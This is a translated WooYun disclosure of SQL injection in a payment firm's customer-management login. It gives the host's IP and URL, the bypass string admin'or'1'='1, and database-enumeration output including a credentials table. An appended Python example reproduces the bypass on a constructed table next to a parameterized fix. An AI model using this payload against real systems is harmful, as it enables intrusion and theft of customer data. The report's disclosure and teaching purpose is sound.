Vulnerability summary

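Vulnerability ID: wooyun-2015-0152716

Title: SQL injection in the 环迅支付 customer information management system

Related vendor: ips.com

Author: Aasron

Submitted: 2015-11-10 12:19

Fixed: 2015-12-26 10:16

Publicly disclosed: 2015-12-26 10:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org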


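Vulnerability details

Disclosure status:

2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-11: Vendor confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and experts in related fields
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to trainee white hats
2015-12-26: Details disclosed to the public

Brief description:

The problem is this serious and your company is this big, so how about a reward!

Detailed description:

I forgot to include the address in my first submission, how annoying~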

http://180.168.26.117:8000/8crm/login.php?msg=1


admin'or'1'='1
admin'or'1'='1
Carry on like this and the customers will all be lost


web server operating system: Windows
web application technology: PHP 5.2.13, Apache 2.2.4
back-end DBMS: MySQL 5.0.12
[03:20:54] [INFO] fetching database names
[03:20:54] [INFO] fetching number of databases
[03:20:54] [INFO] resumed: 3
[03:20:54] [INFO] resumed: information_schema
[03:20:54] [INFO] resumed: crm_db
[03:20:54] [INFO] resumed: mysql
available databases [3]:
[*] crm_db
[*] information_schema
[*] mysql



Database: crm_db
Table: kis_login
[3 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| login_pwd  | varchar(200) |
| login_uid  | varchar(32)  |
| login_uuid | varchar(50)  |
+------------+--------------+



[03:30:38] [INFO] fetching current database
[03:30:38] [INFO] resumed: crm_db
[03:30:38] [INFO] fetching tables for database: 'crm_db'
[03:30:38] [INFO] fetching number of tables for database 'crm_db'
[03:30:38] [INFO] resumed: 193
[03:30:38] [INFO] resumed: kis_data
[03:30:38] [INFO] resumed: kis_login
[03:30:38] [INFO] resumed: kis_syn
[03:30:38] [INFO] resumed: sms2
[03:30:38] [INFO] resumed: tab_account_client
[03:30:38] [INFO] resumed: tab_account_store
[03:30:38] [INFO] resumed: tab_action
[03:30:38] [INFO] resumed: tab_action_emp
[03:30:38] [INFO] resumed: tab_action_histroy
[03:30:38] [INFO] resumed: tab_actionhistroy_emp
[03:30:38] [INFO] resumed: tab_activity_attend
[03:30:38] [INFO] resumed: tab_activity_doc
[03:30:38] [INFO] resumed: tab_activity_enroll
[03:30:38] [INFO] resumed: tab_activity_linit


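Too long to list; 193 tables in total, impressive~~
I won't test any deeper; if this customer information leaked out, the harm would be great!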

Fix:

A reward is what gives motivation!

Copyright notice: when reposting, please credit the source Aasron@乌云
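
The login bypass reported above, reproduced against a constructed in-memory SQLite table next to a parameterized version; this is an added example, not code from the original report or from the vendor's application. The concatenated query shape, the PBKDF2 password format and all sample values are assumptions; only the kis_login column names and the input string come from the report.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "admin'or'1'='1"  # the string entered on the login form in the report


def pwd_hash(password: str, salt: bytes) -> str:
    # Constructed storage format (assumption): salt_hex$pbkdf2_hex
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def make_db() -> sqlite3.Connection:
    # Constructed sample data; table and column names follow the kis_login dump.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE kis_login (login_uid TEXT, login_pwd TEXT, login_uuid TEXT)")
    db.execute("INSERT INTO kis_login VALUES (?, ?, ?)",
               ("admin", pwd_hash("constructed-secret", b"constructed-salt"), "u-0001"))
    return db


def login_concat(db: sqlite3.Connection, uid: str, pwd: str) -> bool:
    # Assumed vulnerable shape: form input is spliced into the SQL text,
    # so a quote in the input ends the literal and the rest runs as SQL.
    sql = ("SELECT login_uid FROM kis_login "
           f"WHERE login_uid = '{uid}' AND login_pwd = '{pwd}'")
    return db.execute(sql).fetchone() is not None


def login_param(db: sqlite3.Connection, uid: str, pwd: str) -> bool:
    # Input is bound as data; the password is verified outside SQL.
    row = db.execute("SELECT login_pwd FROM kis_login WHERE login_uid = ?",
                     (uid,)).fetchone()
    if row is None:
        return False
    salt_hex, _ = row[0].split("$")
    return hmac.compare_digest(row[0], pwd_hash(pwd, bytes.fromhex(salt_hex)))


if __name__ == "__main__":
    db = make_db()
    print("concatenated, report input:", login_concat(db, PAYLOAD, PAYLOAD))
    print("concatenated, wrong pwd:   ", login_concat(db, "admin", "wrong"))
    print("parameterized, report input:", login_param(db, PAYLOAD, PAYLOAD))
    print("parameterized, valid login: ", login_param(db, "admin", "constructed-secret"))
```
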


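Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-11-11 10:14

Vendor reply:

Thank you for posting; we will handle it right away

Latest status:

None yet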